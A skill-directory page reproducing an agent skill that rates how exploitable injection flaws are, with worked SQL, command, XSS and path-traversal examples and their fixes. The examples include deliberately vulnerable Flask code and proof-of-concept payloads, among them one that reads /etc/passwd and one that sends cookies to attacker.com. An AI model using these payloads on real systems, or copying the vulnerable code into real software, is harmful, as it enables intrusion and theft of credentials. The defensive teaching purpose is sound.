Agent skill

Exploitability Analyzer

by ArabelaTso in ArabelaTso/Skills-4-SE

Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context.

Apache-2.0Auto-check passedSecurity

Install Exploitability Analyzer

skills CLI
$ npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install ArabelaTso/Skills-4-SE exploitability-analyzer --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/ArabelaTso/Skills-4-SE.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploitability-analyzer .claude/skills/exploitability-analyzer && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
exploitability-analyzer
GitHub stars
253
Token cost
~3.5k tokens
SKILL.md length
1,063 words
Files
2 (incl. references)
Skills in repo
150
Repo updated
First seen
Licence
Apache-2.0

At a glance

Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context.

  • Works in 7 steps: Identify Vulnerability Type → Trace Data Flow → Assess Reachability → …
  • Determine if a vulnerability is actually exploitable in practice
  • SKILL.md covers Overview, How to Use, Analysis Workflow and Example: SQL Injection…, plus 7 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md

What it does

Exploitability Analyzer is an agent skill from ArabelaTso/Skills-4-SE. Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context. Use when users need to: (1) Determine if a vulnerability is actually exploitable in practice, (2) Assess severity and impact of security issues, (3) Prioritize vulnerability remediation, (4) Understand attack vectors and exploitation conditions, (5) Generate exploitability reports with proof-of-concept scenarios. Focuses on injection vulnerabilities (SQL…

Its SKILL.md is about 3.5k tokens, which your agent loads only when the skill is triggered. The skill folder holds 2 other files, including reference files (for example `references/assessment_criteria.md`).

It sits in Security, covering Web application vulnerabilities, Prototyping and Penetration testing. It works with SQL. The repository describes itself as: A curated list of 180+ useful Claude Skills for Software Engineering and resources for customizing AI for SE workflows. The licence is Apache-2.0.

When your agent uses it

  • Determine if a vulnerability is actually exploitable in practice
  • Assess severity and impact of security issues
  • Prioritize vulnerability remediation
  • Understand attack vectors and exploitation conditions

Example prompts

  • “/exploitability-analyzer”

Requirements

  • Python 3

Workflow steps

7 steps, taken from the step headings in SKILL.md.

  1. Identify Vulnerability Type
  2. Trace Data Flow
  3. Assess Reachability
  4. Evaluate Controllability
  5. Analyze Sanitization
  6. Determine Impact
  7. Calculate Exploitability

What it can do on your machine

Read from SKILL.md and the folder at commit 4f38503. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md (its code samples are python).

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Exploitability Analyzer loads about 3.5k tokens when it runs, and up to ~6.5k if it reads all its reference files. Until then it costs about 163 tokens; SKILL.md has 1,063 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~163
When it runs · the whole SKILL.md, loaded when a task matches
~3.5k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~6.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from ArabelaTso/Skills-4-SE at commit 4f38503, republished under its Apache-2.0 licence (© ArabelaTso). 1,063 words, ~3,538 tokens.

Download SKILL.mdSave it as .claude/skills/exploitability-analyzer/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.
name
exploitability-analyzer
description
Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context. Use when users need to: (1) Determine if a vulnerability is actually exploitable in practice, (2) Assess severity and impact of security issues, (3) Prioritize vulnerability remediation, (4) Understand attack vectors and exploitation conditions, (5) Generate exploitability reports with proof-of-concept scenarios. Focuses on injection vulnerabilities (SQL, command, XSS, path traversal, LDAP) with detailed analysis of reachability, controllability, sanitization, and impact.

Exploitability Analyzer

Assess whether detected vulnerabilities are realistically exploitable.

Overview

This skill analyzes security vulnerabilities to determine if they're actually exploitable in practice. It examines control flow to assess reachability, traces input sources to evaluate controllability, analyzes sanitization logic, and considers execution context to provide realistic exploitability assessments with severity ratings.

How to Use

Provide:

  1. Vulnerable code: The code containing the vulnerability
  2. Vulnerability type: SQL injection, XSS, command injection, etc.
  3. Context: Surrounding code, input sources, sanitization functions
  4. Environment (optional): Execution privileges, security controls

The skill will analyze:

  • Reachability: Can attackers reach the vulnerable code?
  • Controllability: Can attackers control the vulnerable input?
  • Sanitization: Is input properly sanitized?
  • Impact: What damage can be caused?
  • Exploitability: Overall assessment (Critical/High/Medium/Low/None)

Analysis Workflow

Step 1: Identify Vulnerability Type

Classify the vulnerability:

  • SQL Injection
  • Command Injection
  • Cross-Site Scripting (XSS)
  • Path Traversal
  • LDAP Injection
  • Other injection types
Step 2: Trace Data Flow

Follow the data from source to sink:

Source: Where does the input originate?

  • User input (query params, POST data, headers)
  • Database values (second-order injection)
  • Configuration files
  • Environment variables
  • Hardcoded values

Transformations: What happens to the input?

  • Validation checks
  • Sanitization functions
  • Encoding/escaping
  • String operations

Sink: Where is the input used dangerously?

  • SQL query execution
  • System command execution
  • HTML rendering
  • File system operations
Step 3: Assess Reachability

Question: Can an attacker reach the vulnerable code path?

Critical: Public endpoint, no authentication High: Authenticated endpoint, common user role Medium: Requires specific conditions or privileges Low: Admin-only, internal function, rare code path None: Dead code, unreachable

Step 4: Evaluate Controllability

Question: Can an attacker control the vulnerable input?

High: Direct user input (GET/POST parameters, headers) Medium: Indirect control (database, config files) Low: Derived values, heavily processed None: Hardcoded, system-generated

Step 5: Analyze Sanitization

Question: Is the input properly sanitized?

None: No sanitization, direct pass-through Weak: Blacklist filtering, incomplete escaping Partial: Some sanitization but bypassable Strong: Whitelist validation, proper escaping, parameterization

Step 6: Determine Impact

Question: What damage can an attacker cause?

Critical: Remote code execution, full system compromise High: Data breach, privilege escalation, DoS Medium: Limited data access, information disclosure Low: Minor information leak, cosmetic issues

Step 7: Calculate Exploitability

Combine factors to determine overall exploitability:

ReachabilityControllabilitySanitizationImpactExploitability
HighHighNoneCriticalCRITICAL
HighHighWeakHighHIGH
HighHighPartialMediumMEDIUM
MediumMediumStrongLowLOW
AnyAnyStrongAnyNONE

Example: SQL Injection (Critical)

Vulnerable Code:

python
@app.route('/user')
def get_user():
    username = request.args.get('username')
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)
    return cursor.fetchone()

Analysis:

1. Vulnerability Type: SQL Injection

2. Data Flow:

  • Source: request.args.get('username') - user-controlled query parameter
  • Transformations: None - direct string formatting
  • Sink: cursor.execute(query) - SQL execution

3. Reachability: High

  • Public endpoint (/user)
  • No authentication required
  • Easily accessible via HTTP GET

4. Controllability: High

  • Direct user input via query parameter
  • Attacker has full control over username value
  • No restrictions on input format

5. Sanitization: None

  • No input validation
  • No escaping or parameterization
  • Direct string formatting with f-string
  • SQL metacharacters not filtered

6. Impact: Critical

  • Full database access possible
  • Can extract all user data
  • Potential for data modification/deletion
  • May enable privilege escalation
  • Possible RCE via stored procedures (database-dependent)

7. Exploitability: CRITICAL

Proof-of-Concept:

GET /user?username=' OR '1'='1' --

This bypasses authentication and returns all users.

Advanced Exploit:

GET /user?username=' UNION SELECT password FROM admin_users --

This extracts admin passwords.

Remediation:

python
@app.route('/user')
def get_user():
    username = request.args.get('username')
    # Use parameterized query
    query = "SELECT * FROM users WHERE username = ?"
    cursor.execute(query, (username,))
    return cursor.fetchone()

Example: Command Injection (High)

Vulnerable Code:

python
@app.route('/ping')
def ping_host():
    host = request.form.get('host')
    if ';' in host or '|' in host:
        return "Invalid host"
    result = os.system(f"ping -c 4 {host}")
    return f"Ping result: {result}"

Analysis:

1. Vulnerability Type: Command Injection

2. Data Flow:

  • Source: request.form.get('host') - user-controlled POST parameter
  • Transformations: Blacklist check for ; and |
  • Sink: os.system() - shell command execution

3. Reachability: High

  • Public endpoint
  • POST request (slightly less accessible than GET)
  • No authentication

4. Controllability: High

  • Direct user input
  • Attacker controls host parameter

5. Sanitization: Weak

  • Blacklist filtering only checks ; and |
  • Incomplete - doesn't block $(), backticks, &&, ||, newlines
  • Easily bypassable

6. Impact: Critical

  • Remote code execution
  • Full system compromise possible
  • Depends on execution privileges (web server user)

7. Exploitability: HIGH (not Critical due to weak sanitization that may deter casual attackers)

Proof-of-Concept:

POST /ping
host=$(whoami)

This executes whoami command.

Advanced Exploit:

POST /ping
host=127.0.0.1 && cat /etc/passwd

This reads sensitive files.

Remediation:

python
import subprocess
import shlex

@app.route('/ping')
def ping_host():
    host = request.form.get('host')
    # Validate input with whitelist
    if not re.match(r'^[a-zA-Z0-9.-]+$', host):
        return "Invalid host"
    # Use subprocess without shell
    result = subprocess.run(['ping', '-c', '4', host],
                          capture_output=True, text=True)
    return f"Ping result: {result.stdout}"
Show full SKILL.md (433 more words)Show less

Example: XSS (Medium)

Vulnerable Code:

python
@app.route('/search')
def search():
    query = request.args.get('q', '')
    results = db.search(query)
    return render_template_string(f"""
        <h1>Search Results for: {query}</h1>
        <ul>
        {% for result in results %}
            <li>{{ result }}</li>
        {% endfor %}
        </ul>
    """, results=results)

Analysis:

1. Vulnerability Type: Cross-Site Scripting (XSS)

2. Data Flow:

  • Source: request.args.get('q') - user-controlled query parameter
  • Transformations: None
  • Sink: render_template_string() - HTML rendering with f-string

3. Reachability: High

  • Public search endpoint
  • No authentication required

4. Controllability: High

  • Direct user input via query parameter
  • Attacker controls search query

5. Sanitization: None

  • No HTML encoding
  • Direct insertion into HTML via f-string
  • Jinja2 auto-escaping bypassed by f-string

6. Impact: High

  • Session hijacking (steal cookies)
  • Phishing attacks
  • Defacement
  • Keylogging
  • Limited by browser security (CSP, HTTPOnly cookies)

7. Exploitability: MEDIUM (assuming modern browser protections)

Proof-of-Concept:

GET /search?q=<script>alert(document.cookie)</script>

This executes JavaScript in victim's browser.

Advanced Exploit:

GET /search?q=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

This exfiltrates session cookies.

Remediation:

python
from markupsafe import escape

@app.route('/search')
def search():
    query = request.args.get('q', '')
    results = db.search(query)
    # Use proper template with auto-escaping
    return render_template('search.html',
                         query=escape(query),
                         results=results)

Example: Path Traversal (Low)

Vulnerable Code:

python
@app.route('/download')
@login_required  # Requires authentication
def download_file():
    filename = request.args.get('file')
    # Blacklist check
    if '..' in filename:
        return "Invalid filename"
    filepath = os.path.join('/var/www/uploads', filename)
    return send_file(filepath)

Analysis:

1. Vulnerability Type: Path Traversal

2. Data Flow:

  • Source: request.args.get('file') - user-controlled
  • Transformations: Blacklist check for ..
  • Sink: send_file() - file system access

3. Reachability: Medium

  • Requires authentication (@login_required)
  • Accessible to authenticated users
  • Not public

4. Controllability: High

  • Direct user input
  • Attacker controls filename

5. Sanitization: Weak

  • Blacklist only checks ..
  • Doesn't prevent absolute paths
  • Bypassable with URL encoding or alternate representations

6. Impact: Medium

  • Information disclosure
  • Limited to files readable by web server user
  • Cannot execute code directly
  • Depends on file system permissions

7. Exploitability: LOW (authentication required + weak but present sanitization)

Proof-of-Concept:

GET /download?file=/etc/passwd

This may read sensitive files if absolute paths work.

Bypass Attempt:

GET /download?file=....//....//etc/passwd

This may bypass the .. check.

Remediation:

python
import os

@app.route('/download')
@login_required
def download_file():
    filename = request.args.get('file')
    # Whitelist validation
    if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
        return "Invalid filename"
    # Resolve and validate path
    base_dir = '/var/www/uploads'
    filepath = os.path.realpath(os.path.join(base_dir, filename))
    if not filepath.startswith(base_dir):
        return "Access denied"
    return send_file(filepath)

Exploitability Rating Scale

CRITICAL
  • Reachable: Public, no auth
  • Controllable: Direct user input
  • Sanitization: None
  • Impact: RCE, full compromise
  • Action: Immediate fix required
HIGH
  • Reachable: Public or authenticated
  • Controllable: Direct or indirect
  • Sanitization: Weak or bypassable
  • Impact: Data breach, privilege escalation
  • Action: Fix urgently (within days)
MEDIUM
  • Reachable: Authenticated or conditional
  • Controllable: Partial control
  • Sanitization: Partial but incomplete
  • Impact: Limited data access
  • Action: Fix in next release
LOW
  • Reachable: Restricted access
  • Controllable: Limited control
  • Sanitization: Mostly effective
  • Impact: Minor information leak
  • Action: Fix when convenient
NONE
  • Strong sanitization present
  • Not reachable by attackers
  • No realistic exploitation path
  • Action: No immediate action needed

Report Format

For each vulnerability, provide:

VULNERABILITY: <Type> in <Location>

Location: <File:line or endpoint>
Vulnerability Type: <SQL Injection, XSS, etc.>

DATA FLOW:
Source: <Where input comes from>
Transformations: <What happens to input>
Sink: <Where input is used dangerously>

EXPLOITABILITY ASSESSMENT:
Reachability: <Critical/High/Medium/Low/None> - <Explanation>
Controllability: <High/Medium/Low/None> - <Explanation>
Sanitization: <None/Weak/Partial/Strong> - <Explanation>
Impact: <Critical/High/Medium/Low> - <Explanation>

OVERALL EXPLOITABILITY: <CRITICAL/HIGH/MEDIUM/LOW/NONE>

PROOF-OF-CONCEPT:
<Example exploit demonstrating the vulnerability>

IMPACT:
<Detailed description of potential damage>

REMEDIATION:
<Specific code fix or mitigation strategy>

References

Detailed assessment criteria:

  • assessment_criteria.md: Comprehensive exploitability assessment framework with matrices for each vulnerability type

Load this reference when:

  • Need detailed criteria for specific vulnerability types
  • Want to see exploitability matrices
  • Need more examples of each assessment factor

Tips

  1. Trace data flow completely: Follow input from source to sink
  2. Don't assume sanitization works: Test for bypasses
  3. Consider execution context: Privileges matter for impact
  4. Check for defense in depth: Multiple protections reduce exploitability
  5. Verify reachability: Dead code isn't exploitable
  6. Test proof-of-concepts: Confirm exploitability when possible
  7. Consider real-world constraints: Authentication, rate limiting, monitoring
  8. Prioritize by exploitability: Fix critical issues first

© ArabelaTso, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 1 other file (references) in skills/exploitability-analyzer of ArabelaTso/Skills-4-SE.

  • SKILL.md
  • references/assessment_criteria.md

Open the folder on GitHubat commit 4f38503

Compare with similar skills

Exploitability Analyzer next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Exploitability Analyzer compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Exploitability Analyzer this skillArabelaTso/Skills-4-SE253—~3.5kAutomated safety check: PassApache-2.0
Code Security AuditProgrammerAnthony/Expert-Coding-Harness235—~1.6kAutomated safety check: PassMIT
Web Sqlis0ld13rr/pentestcode827—~710Automated safety check: PassMIT
Secknowledge SkillPa55w0rd/secknowledge-skill423—~2.7kAutomated safety check: PassNone
Php Codeigniter Audit0xShe/PHP-Code-Audit-Skill4021 repos~477Automated safety check: PassNone
Security ReviewerAratKruglik/claude-laravel1551 repos~1.1kAutomated safety check: NotesNone

Similar skills

  • Code Security Audit

    ProgrammerAnthony/Expert-Coding-Harness

    A skill your agent uses when 用户需要对代码进行安全审计、发现安全漏洞、上线前安全评估、检查代码是否存在安全风险时。触发场景:代码安全审计、安全审计、白盒审计、安全扫描、漏洞检测、漏洞挖掘、SQL注入、命令注入、XSS、SSRF、反序列化、认证绕过、越权、代码安全检查、security audit、code…

    235 GitHub stars~1.6k tokensUpdated 4 mo ago
    SecurityAuto-check passed
  • Web Sqli

    s0ld13rr/pentestcode

    SQL injection detection→exploitation→proof for web apps and APIs.

    827 GitHub stars~710 tokensUpdated 5 days ago
    SecurityAuto-check passed
  • Secknowledge Skill

    Pa55w0rd/secknowledge-skill

    Web+AI 安全测试知识库。融合 WooYun 88,636 案例 + 先知 L1-L4 方法论 + GAARM 173 风险 + OWASP Top 10 (LLM/ASI/WSTG)。

    423 GitHub stars~2.7k tokensUpdated 3 mo ago
    SecurityAuto-check passed
  • Php Codeigniter Audit

    0xShe/PHP-Code-Audit-Skill

    CodeIgniter 框架特效安全审计工具。针对 CodeIgniter 的 CSRF、XSS 输出过滤、数据库查询构造、路由与验证器配置、会话 Cookie 安全等机制进行白盒静态审计,并映射到通用漏洞类型体系(CSRF/AUTH/XSS/SQL/CFG/SESS 等)。

    402 GitHub starsUsed in 1 repo~477 tokens
    SecurityAuto-check passed
  • Security Reviewer

    AratKruglik/claude-laravel

    A skill your agent uses when conducting security audits, reviewing code for vulnerabilities, or analyzing infrastructure security.

    155 GitHub starsUsed in 1 repo~1.1k tokens
    SecurityAuto-check: notes
  • TS Review

    liuyanghejerry/Clausura

    TypeScript monorepo 审查:XSS、SQL 注入、密钥、any、console.log. An agent skill from liuyanghejerry/Clausura.

    204 GitHub stars~166 tokensUpdated 9 days ago
    SecurityAuto-check passed

More from ArabelaTso/Skills-4-SE

All 150 skills in this repo
  • Framework Migration Assistant

    ArabelaTso/Skills-4-SE

    Automatically migrate Python web applications between frameworks (Flask → FastAPI, Django → FastAPI).

    253 GitHub stars~1.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Metamorphic Test Generator

    ArabelaTso/Skills-4-SE

    Generate test cases using metamorphic testing by applying transformations based on metamorphic properties.

    253 GitHub stars~798 tokensUpdated 1 mo ago
    Auto-check passed
  • Reproduction Trace Instrumenter

    ArabelaTso/Skills-4-SE

    Instruments programs to capture execution traces specifically for reproducing reported bugs, enabling consistent replay and diagnosis of failures.

    253 GitHub stars~2.4k tokensUpdated 1 mo ago
    Auto-check passed
  • Spring Mvc To Boot Migrator

    ArabelaTso/Skills-4-SE

    Automatically migrate Spring MVC applications to Spring Boot.

    253 GitHub stars~2.2k tokensUpdated 1 mo ago
    Auto-check passed
  • State Snapshot Instrumenter

    ArabelaTso/Skills-4-SE

    Instrument programs (Python, C/C++, Java) to capture snapshots of key program states at runtime, including variables, memory, and call stacks.

    253 GitHub stars~2.2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Categories

Questions about Exploitability Analyzer

What does Exploitability Analyzer do?

Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context. Exploitability Analyzer is an agent skill from ArabelaTso/Skills-4-SE. Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context.

When should I use Exploitability Analyzer?

Exploitability Analyzer fits situations like: determine if a vulnerability is actually exploitable in practice; assess severity and impact of security issues; prioritize vulnerability remediation; understand attack vectors and exploitation conditions.

How do I install Exploitability Analyzer in Claude Code?

Run `npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a claude-code`. Or copy the skill folder (skills/exploitability-analyzer in ArabelaTso/Skills-4-SE) into .claude/skills/exploitability-analyzer in your project. Claude Code loads it when a task matches its description.

How do I install Exploitability Analyzer in Codex?

Run `npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a codex`. Or copy the skill folder (skills/exploitability-analyzer in ArabelaTso/Skills-4-SE) into .agents/skills/exploitability-analyzer in your project. Codex loads it when a task matches its description.

Can I use Exploitability Analyzer in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploitability-analyzer, .gemini/skills/exploitability-analyzer, .github/skills/exploitability-analyzer and .opencode/skills/exploitability-analyzer in your project.

What does Exploitability Analyzer need to run?

SKILL.md names no scripts, command-line tools or credentials: Exploitability Analyzer is instructions for the agent only. Our summary lists: Python 3.

Does Exploitability Analyzer access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Exploitability Analyzer safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Exploitability Analyzer use?

Exploitability Analyzer is published under the Apache-2.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Exploitability Analyzer use?

About 3.5k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 2.9k tokens, read only when the agent opens those files.

What are the alternatives to Exploitability Analyzer?

Skills that share tags, products or a category with Exploitability Analyzer: Code Security Audit (ProgrammerAnthony/Expert-Coding-Harness, 235 stars), Web Sqli (s0ld13rr/pentestcode, 827 stars), Secknowledge Skill (Pa55w0rd/secknowledge-skill, 423 stars) and Php Codeigniter Audit (0xShe/PHP-Code-Audit-Skill, 402 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Exploitability Analyzer?

ArabelaTso (a GitHub user) maintains it in ArabelaTso/Skills-4-SE, which has 253 GitHub stars. The repository holds 150 skills in this directory. The repository was last updated on August 21, 2026.

Source: ArabelaTso/Skills-4-SE on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.